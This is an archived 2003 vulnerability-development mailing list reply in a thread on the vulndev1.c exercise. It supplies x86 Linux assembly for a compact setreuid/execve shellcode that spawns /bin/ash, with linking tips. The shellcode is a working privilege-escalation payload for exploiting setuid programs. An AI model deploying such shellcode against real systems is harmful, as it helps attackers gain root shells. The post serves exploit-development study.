Vulnerability Development mailing list archives

Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)


From: sin <sin () insolence net>
Date: Fri, 23 May 2003 11:06:56 -0500 (CDT)


I haven't been really following the thread too much, although I did take a
look at the code (vulndev1.c). Anyway, if someone is having a problem with
shellcode, here is the asm for a generic sys_setreuid/execve shellcode
that's on the smaller side.

.section .text
        .global _s

_s:
        xorl  %ebx,  %ebx
        xorl  %ecx,  %ecx
        movb  $0x46, %al    # sys_setreuid
        int   $0x80

        xorl  %eax,  %eax
        pushl %eax
        pushl $0x6873612f   # hsa/
        pushl $0x6e69622f   # nib/
        movl  %esp,  %ebx
        pushl %eax
        pushl %ebx
        movl  %esp,  %ecx
        xorl  %edx,  %edx
        movb  $0xb,  %al    # sys_execve
        int   $0x80


Ah, this calls /bin/ash; if you don't have it, change the string, and make
sure to pass the -e flag to ld. It's small; it comes out to like 20+ bytes or
similar, I can't remember.

If I misread a post, well, ignore me.


"Once set in motion, the process of questioning could come to but one end,
the erosion of conviction and certitude and collapse into despair" (The
Specter of the Absurd, 1988).
